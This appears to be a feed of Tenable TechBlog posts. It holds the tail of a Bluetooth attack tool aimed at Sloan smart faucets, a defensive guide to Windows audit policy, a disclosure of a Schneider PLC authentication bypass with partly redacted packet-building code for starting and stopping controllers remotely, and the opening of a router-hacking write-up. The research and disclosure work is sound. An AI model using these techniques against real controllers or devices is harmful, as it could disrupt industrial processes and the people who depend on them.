    while True:
        selection = input("Enter a #: ")
        if selection in ATTACKS_DICT:
            return ATTACKS_DICT[selection]


def menu_pick_device(devices):
    # Build a numbered menu of devices whose advertised name contains "FAUCET".
    menu = {}
    i = 1
    for dev in devices:
        for (adtype, desc, value) in dev.getScanData():
            if desc == "Complete Local Name" and isinstance(value, str) and "FAUCET" in value:
                menu[str(i)] = {"name": value, "dev": dev}
                i += 1
    if not menu:
        return None
    for entry in menu:
        print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
    selection = input("Enter a device #: ")
    # Returns None when the selection is not in the menu.
    return menu.get(selection)


def lescan():
    # Scanner(1) uses HCI interface index 1 (hci1); use Scanner(0) for hci0.
    scanner = Scanner(1).withDelegate(ScanDelegate())
    try:
        print(f"[*] scanning for {SCAN_TIMEOUT}")
        devices = scanner.scan(SCAN_TIMEOUT)
    except BTLEManagementError:
        print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
        return None
    return devices


def main():
    print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
    while True:
        found_devices = lescan()
        if not found_devices:
            print("[*] something's not write. exiting.")
            return
        target = menu_pick_device(found_devices)
        if not target:
            print("[*] target not found. have you tried turning it off and on again?")
            continue
        p = Peripheral(target['dev'].addr)
        # To skip scanning, hard-code an address instead:
        #p = Peripheral('08:6b:d7:20:9d:4b')
        # Keep offering attacks against the connected device until interrupted.
        while target:
            attack = menu_pick_attack(target)
            run_sink_flood(attack, target, p)


if __name__ == "__main__":
    main()

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most relevant sources for detecting Active Directory attacks, but it should apply to all kinds of Windows machines (servers and workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot use both. Once you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).
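The behavior we observed can be summarized with a small model. This is only a sketch of what we saw in our tests, not how Windows implements it: the function name is hypothetical, and the basic policy is assumed to be already expanded to subcategory names for simplicity.

```python
NO_AUDITING = "No Auditing"


def effective_policy(basic: dict, advanced: dict, subcategories: list) -> dict:
    """Model the observed switch from basic to advanced audit policy.

    As soon as one advanced setting exists, the basic settings are ignored
    and every subcategory not set in the advanced policy is not audited.
    """
    source = advanced if advanced else basic
    return {name: source.get(name, NO_AUDITING) for name in subcategories}


subcategories = ["Sensitive Privilege Use", "Account Lockout", "Logon"]
basic = {"Sensitive Privilege Use": "Success and Failure"}

before = effective_policy(basic, {}, subcategories)
after = effective_policy(basic, {"Account Lockout": "Success"}, subcategories)
```

In this model, “Sensitive Privilege Use” is audited in `before` but falls back to “No Auditing” in `after`, mirroring the demonstration above.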

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked as high as possible, instead of spreading those settings across many lower-level GPOs.
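One way to apply this recommendation is to review a GPO’s settings against the list of settings you care about. The sketch below assumes the advanced audit settings have already been exported into a dictionary by some other means; the function name and data layout are hypothetical.

```python
EXPLICIT_VALUES = {"No Auditing", "Success", "Failure", "Success and Failure"}


def find_unconfigured(settings_of_interest: list, gpo_settings: dict) -> list:
    """Return the settings that have no explicit value in the GPO."""
    return [
        name
        for name in settings_of_interest
        if gpo_settings.get(name) not in EXPLICIT_VALUES
    ]


gpo_settings = {"Account Lockout": "Success", "Logoff": "Not Configured"}
missing = find_unconfigured(["Account Lockout", "Logon", "Logoff"], gpo_settings)
```

Here `missing` contains “Logon” and “Logoff”, the two settings that would otherwise depend on a default value.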

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

“Default Domain Policy” linked at the top of the Active Directory domain

  • “Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • “Audit Logon” is set to “Success” (red highlighting)

“Default Domain Controllers Policy” linked to the “Domain Controllers” organizational unit

  • “Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • “Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged: the value from the “Default Domain Controllers Policy” is the one applied. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.
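The "no merge" behavior can be modeled in a few lines of Python. This is only a sketch of the precedence logic described above, not of the Group Policy engine itself; the dictionary layout and the function name resulting_policy are assumptions made for illustration.

```python
from typing import Dict, List

# Each GPO maps an audit subcategory to its configured value (hypothetical model).
Gpo = Dict[str, str]


def resulting_policy(gpos_low_to_high: List[Gpo]) -> Dict[str, str]:
    """Return the effective value per subcategory, lowest precedence first."""
    effective: Dict[str, str] = {}
    for gpo in gpos_low_to_high:
        # A higher-precedence GPO replaces the whole value: "Success" and
        # "Failure" are never combined into "Success and Failure".
        effective.update(gpo)
    return effective


default_domain_policy = {
    "Account Lockout": "Success and Failure",
    "Logon": "Success",
}
default_domain_controllers_policy = {
    "Logoff": "Success and Failure",
    "Logon": "Failure",
}

policy = resulting_policy([default_domain_policy, default_domain_controllers_policy])
print(policy["Logon"])  # Failure
```

Settings that appear in only one GPO ("Account Lockout", "Logoff") pass through untouched, which matches the demonstration.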

Here is how Microsoft’s Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicy, which finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”
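If you want to collect this output programmatically, the following is a minimal sketch. It assumes the "/r" option of auditpol.exe (CSV report output) and assumes the CSV header uses the column names "Subcategory" and "Inclusion Setting"; the sample rows are made up for illustration. The function names are hypothetical.

```python
import csv
import io
import subprocess
from typing import Dict


def parse_auditpol_csv(report: str) -> Dict[str, str]:
    """Map each subcategory name to its effective inclusion setting."""
    rows = csv.DictReader(io.StringIO(report.strip()))
    return {
        row["Subcategory"]: row["Inclusion Setting"]
        for row in rows
        if row.get("Subcategory")
    }


def effective_audit_policy() -> Dict[str, str]:
    """Run auditpol.exe locally (Windows only, needs an elevated prompt)."""
    output = subprocess.run(
        ["auditpol.exe", "/get", "/category:*", "/r"],
        capture_output=True, text=True, check=True,
    ).stdout
    return parse_auditpol_csv(output)


# Illustrative sample, not captured from a real machine.
sample = """Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting
TEST-MACHINE,System,Logon,{0CCE9215-69AE-11D9-BED3-505054503030},No Auditing,
TEST-MACHINE,System,Account Lockout,{0CCE9217-69AE-11D9-BED3-505054503030},Success,
"""
print(parse_auditpol_csv(sample))
```

Comparing this dictionary against the values you intended to configure is a quick way to catch the surprises described in this article.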

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213-69AE-11D9-BED3-505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212-69AE-11D9-BED3-505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3-505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3-505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):
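To make the point concrete, here is a small sketch that decodes an “audit.csv” file using only the numeric “Setting Value” column and ignoring the text column. The meanings of “0” and “4” follow our observations above; the value “2” for “Failure” is an assumption based on the success/failure pattern of “1” and “3”. The function name is hypothetical.

```python
import csv
import io

# Numeric "Setting Value" meanings as observed (0, 4) or assumed (2).
SETTING_VALUES = {
    "0": "No Auditing",
    "1": "Success",
    "2": "Failure",
    "3": "Success and Failure",
    "4": "Not specified",
}


def decode_audit_csv(text):
    """Return {subcategory: decoded setting}, ignoring the free-text column."""
    decoded = {}
    for row in csv.DictReader(io.StringIO(text.strip())):
        decoded[row["Subcategory"]] = SETTING_VALUES.get(
            row["Setting Value"], "Unknown"
        )
    return decoded


example = """Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213-69AE-11D9-BED3-505054503030},No Auditing,,0
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3-505054503030},Not specified,,0
"""
for name, setting in decode_audit_csv(example).items():
    print(name, "->", setting)
```

Both rows decode to “No Auditing”, regardless of what the “Inclusion Setting” text says.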

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors (temperature, pressure, proximity, etc.) and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. Stuxnet) to make it into these environments when engineers or technicians plug outside equipment, such as laptops for maintenance, into the network.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols: FTP and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in Modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.
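To illustrate the tunneling, here is a rough sketch of how a UMAS message can be wrapped in a Modbus TCP frame. The MBAP header layout (transaction id, protocol id, length, unit id) is standard Modbus TCP; the function name, the parameter names, and the choice of 0x00 for the first byte after 0x5a are assumptions for illustration only.

```python
import struct

UMAS_FUNCTION_CODE = 0x5A  # Schneider Electric's custom Modbus function code (90)


def build_umas_frame(transaction_id, unit_id, session_byte, umas_type, payload=b""):
    """Wrap a UMAS message in a Modbus TCP (MBAP) frame."""
    # PDU: function code, one byte, then the UMAS packet type and its data.
    pdu = bytes([UMAS_FUNCTION_CODE, session_byte, umas_type]) + payload
    # MBAP header: transaction id, protocol id (always 0), length, unit id.
    # The length field counts the unit id byte plus the PDU.
    header = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return header + pdu


# A READ_ID request (UMAS packet type 0x02).
frame = build_umas_frame(transaction_id=1, unit_id=0, session_byte=0x00, umas_type=0x02)
print(frame.hex())  # 000100000004005a0002
```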

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (version 3.01, released 2/2019, and later) are designed to prevent a remote attacker from executing certain functions on the controller when an application password is configured under the “Project & Controller Protection” tab in the project properties. Protected functions include starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), and uploading a new project to the controller. Because the feature is improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation”, you first need to generate a 32-byte random nonce (a random number generated once per session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.
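As a sketch, the hash computation looks like this in Python 3. It assumes that “ASCII sha256” means the hexadecimal digest encoded as ASCII text (the letter case used on the wire is not confirmed here), and the all-zero server nonce is only a placeholder for the value returned by the PLC. The function name is hypothetical.

```python
import hashlib
import os


def reservation_hash(server_nonce: bytes, base64_str: bytes, client_nonce: bytes) -> bytes:
    """ASCII hex SHA256 over server nonce + base64 block + client nonce."""
    digest = hashlib.sha256(server_nonce + base64_str + client_nonce).hexdigest()
    return digest.encode("ascii")


client_nonce = os.urandom(32)  # generated by the client
server_nonce = bytes(32)       # placeholder; the real value comes from the PLC
base64_str = b"pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n"

print(len(reservation_hash(server_nonce, base64_str, client_nonce)))  # 64
```

Every input is either sent by the controller before authentication or chosen by the client, which is why the password is never needed.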

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = "\x5a" + check_byte + "\x40\xff\x00"

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

from hashlib import sha256
auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = ("\x5a" + check_byte + "\x38\x01" + auth_hash + to_send)
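The snippets above are written in a Python 2 style, where byte strings are plain str values. For readers on Python 3, here is a sketch of the same steps collected into one function using bytes. The function name and the placeholder nonces are assumptions; the constants are the ones shown above.

```python
from hashlib import sha256


def build_protected_request(check_byte: bytes, hardware_id: bytes,
                            client_nonce: bytes, server_nonce: bytes,
                            body: bytes = b"\x40\xff\x00") -> bytes:
    """Build the UMAS payload (without Modbus header) for a protected request."""
    # Base request: 0x5a, the byte from the reservation response, then the body.
    to_send = b"\x5a" + check_byte + body
    auth_hash_pre = sha256(hardware_id + client_nonce).digest()
    auth_hash_post = sha256(hardware_id + server_nonce).digest()
    auth_hash = sha256(auth_hash_pre + to_send + auth_hash_post).digest()
    return b"\x5a" + check_byte + b"\x38\x01" + auth_hash + to_send


pkt = build_protected_request(
    check_byte=b"\xc9",
    hardware_id=bytes.fromhex("06010301"),
    client_nonce=bytes(32),  # placeholder nonces for illustration
    server_nonce=bytes(32),
)
print(len(pkt))  # 41
```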

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using an ephemeral key-exchange algorithm such as Diffie-Hellman to negotiate a shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented, which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypted” box isn’t checked, this password is in plaintext, which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in Python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.
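As a point of comparison, this is what an unpredictable nonce looks like in Python using the standard library's secrets module. It is a generic illustration, not code from the controller firmware; the function name and the 16-byte size are arbitrary choices.

```python
import secrets


def new_web_nonce(num_bytes: int = 16) -> str:
    """Return a hex-encoded nonce drawn from the OS cryptographic RNG."""
    return secrets.token_hex(num_bytes)


nonce = new_web_nonce()
print(len(nonce))  # 32
```

Unlike a value derived from timestamps and a hard-coded string, knowing when this nonce was generated gives an attacker no help in guessing it.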

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password are stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller were stolen, it might be possible for an attacker to recover this password.
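The difference between the two approaches can be sketched in Python. The example password, the function names, and the PBKDF2 parameters below are illustrative assumptions, not values taken from the firmware.

```python
import codecs
import hashlib
import hmac
import os

# rot13 is its own inverse, so anyone who reads the stored value recovers the password.
stored = codecs.encode("hunter2", "rot_13")
print(codecs.decode(stored, "rot_13"))  # hunter2


def hash_password(password, salt=None):
    """Derive a salted hash; only the salt and digest need to be stored."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


def verify_password(password, salt, expected):
    """Recompute the hash with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)
```

With a salted hash, the stored data lets the device check a login attempt without ever being able to reveal the original password.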

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You cannot rely on client side software (a.k.a. “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electric’s advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERT’s advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Bypassing Authentication on Arcadyan Routers with CVE-2021-20090 and rooting some Buffalo

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

